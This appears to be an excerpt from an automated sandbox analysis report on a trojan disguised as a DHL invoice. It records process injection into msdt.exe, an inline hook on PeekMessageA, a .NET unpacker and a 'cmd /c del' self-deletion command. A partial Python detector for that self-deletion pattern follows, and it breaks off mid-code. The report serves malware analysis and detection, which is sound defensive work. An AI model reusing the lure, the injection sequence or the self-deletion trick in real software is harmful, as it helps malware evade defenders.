          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_00402D90
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0041E59C
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0041D5A3
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0041EDB1
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0041DE45
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_00409E5C
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_00409E60
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_00992855
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0146F900
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_01484120
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_01521002
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0153E824
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_015328EC
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0147B090
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014920A0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_015320A8
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_01532B28
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0152DBD2
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_015203DA
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0149EBB0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0151FA2B
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_015322AE
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_01531D55
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_01532D07
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_01460D20
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_015325DD
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0147D5E0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_01492581
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0152D466
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0147841F
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0153DFCE
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_01531FF1
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0152D616
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_01486E30
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_01532EF7
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_0491B090
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_049320A0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_049D20A8
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_0491841F
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_049C1002
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_04932581
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_049D25DD
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_0491D5E0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_0490F900
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_049D2D07
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_04900D20
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_04924120
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_049D1D55
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_049D22AE
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_049D2EF7
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_04926E30
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_0493EBB0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_049CDBD2
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_049D1FF1
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_049D2B28
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_0071DB58
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_0071E4E9
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_0071D5A3
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_0071EDAD
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_00702D90
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_0071E59C
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_00702D89
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_00709E60
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_00709E5C
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_0071DE45
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_00702FB0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: String function: 0146B150 appears 45 times
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: String function: 0490B150 appears 35 times
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0041A360 NtCreateFile,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0041A410 NtReadFile,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0041A490 NtClose,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0041A540 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0041A40A NtReadFile,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0041A53C NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014A99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014A9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014A9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014A98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014A9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014A9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014A9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014A9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014A95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014A9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014A9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014A97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014A9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014A96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014A9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014A99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014AB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014A9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014A98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014A9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014AA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014A9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014A9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014A9560 NtWriteFile,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014A9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014AAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014A95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014A9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014AA770 NtOpenThread,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014A9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014AA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014A9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014A9FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014A9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014A9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014A9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014A96D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_04949840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_04949860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_049499A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_049495D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_04949910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_04949540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_049496D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_049496E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_04949650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_04949A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_04949660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_04949780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_04949FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_04949710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_049498A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_049498F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_04949820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_0494B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_049499D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_049495F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_0494AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_04949520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_04949950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_04949560 NtWriteFile,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_04949A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_04949610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_04949A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_04949A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_04949A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_04949670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_0494A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_049497A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_0494A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_04949B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_04949730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_04949770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_0494A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_04949760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_0071A360 NtCreateFile,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_0071A410 NtReadFile,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_0071A490 NtClose,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_0071A540 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_0071A40A NtReadFile,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_0071A53C NtAllocateVirtualMemory,
          Source: invoice dhl.delivery document and original invoice sign.exe | Binary or memory string: OriginalFilename vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.366898086.0000000005B80000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameUI.dllF vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000000.348349236.00000000004E2000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameCMSFILEWRITABLETY.exe4 vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUI.dllF vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000000.358229484.0000000000992000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameCMSFILEWRITABLETY.exe4 vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.438653461.00000000033D0000.00000040.00020000.sdmp | Binary or memory string: OriginalFilenamemsdt.exej% vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437873001.00000000016EF000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437330999.000000000155F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000003.361549231.0000000001116000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exe | Binary or memory string: OriginalFilenameCMSFILEWRITABLETY.exe4 vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: invoice dhl.delivery document and original invoice sign.exe | ReversingLabs: Detection: 28%
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown | Process created: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe "C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe"
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Process created: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\invoice dhl.delivery document and original invoice sign.exe.log
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/1@2/1
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7108:120:WilError_01
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp | Binary or memory string: .SlnpI3O)
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp | Binary or memory string: .Slnp
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: invoice dhl.delivery document and original invoice sign.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: invoice dhl.delivery document and original invoice sign.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL | source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.438653461.00000000033D0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP | source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000003.361108586.0000000001000000.00000004.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437330999.000000000155F000.00000040.00000001.sdmp, msdt.exe, 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp, msdt.exe, 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb | source: invoice dhl.delivery document and original invoice sign.exe, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000003.361108586.0000000001000000.00000004.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437330999.000000000155F000.00000040.00000001.sdmp, msdt.exe, msdt.exe, 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp, msdt.exe, 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp
          Source: Binary string: msdt.pdb | source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.438653461.00000000033D0000.00000040.00020000.sdmp

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: invoice dhl.delivery document and original invoice sign.exe, u0006u2000.cs | .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.invoice dhl.delivery document and original invoice sign.exe.4e0000.0.unpack, u0006u2000.cs | .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.invoice dhl.delivery document and original invoice sign.exe.4e0000.0.unpack, u0006u2000.cs | .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.990000.1.unpack, u0006u2000.cs | .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.990000.2.unpack, u0006u2000.cs | .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.990000.9.unpack, u0006u2000.cs | .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.990000.0.unpack, u0006u2000.cs | .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.2.invoice dhl.delivery document and original invoice sign.exe.990000.1.unpack, u0006u2000.cs | .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.990000.7.unpack, u0006u2000.cs | .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.990000.3.unpack, u0006u2000.cs | .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.990000.5.unpack, u0006u2000.cs | .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 0_2_004E2855 push ds; ret
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 0_2_004E322B push ds; ret
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0041685A push C1F93286h; ret
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0041D4B5 push eax; ret
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0041D56C push eax; ret
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0041D502 push eax; ret
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0041D50B push eax; ret
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0041660F push ss; retf
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0040B75A push esp; retf
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_00992855 push ds; ret
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0099322B push ds; ret
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014BD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_0495D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_0071685A push C1F93286h; ret
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_0071D4B5 push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_0071D56C push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_0071D502 push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_0071D50B push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_0071660F push ss; retf
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 11_2_0070B75A push esp; retf
          Source: initial sample | Static PE information: section name: .text entropy: 7.80084963355
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | File created: \invoice dhl.delivery document and original invoice sign.exe

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xE1
          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\msdt.exe | Process created: /c del "C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe"
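          Added example (not part of the Joe Sandbox report): a small Python parser for the "Process created" lines listed above, which rebuilds the parent/child chain and applies the check behind the "Self deletion via cmd delete" signature, a cmd.exe "/c del" whose target is the image of a process already seen in the run. The five report lines are re-typed inline as constructed input; the parser accepts both the flattened form the page was extracted in ("...msdt.exeProcess created: ...") and the form with a " | " column separator. Splitting the image path from its arguments at the first ".exe" followed by a space is a heuristic assumed for this report format, and all function names are the example's own.

```python
import re
from typing import Dict, List, NamedTuple


class ProcEvent(NamedTuple):
    parent: str    # image of the creating process ("unknown" for the root of the run)
    image: str     # image of the created process
    cmdline: str   # created process's full command line as the report prints it


# Constructed input: the five "Process created" lines of this report, re-typed.
SAMPLE = r"C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe"
REPORT_LINES = [
    rf'Source: unknown | Process created: {SAMPLE} "{SAMPLE}"',
    rf"Source: {SAMPLE} | Process created: {SAMPLE} {SAMPLE}",
    r"Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe",
    rf'Source: C:\Windows\SysWOW64\msdt.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "{SAMPLE}"',
    r"Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
]

# "Source: <parent>[ | ]Process created: <rest>"; the " | " separator is optional so the
# flattened extraction ("explorer.exeProcess created:") parses the same way.
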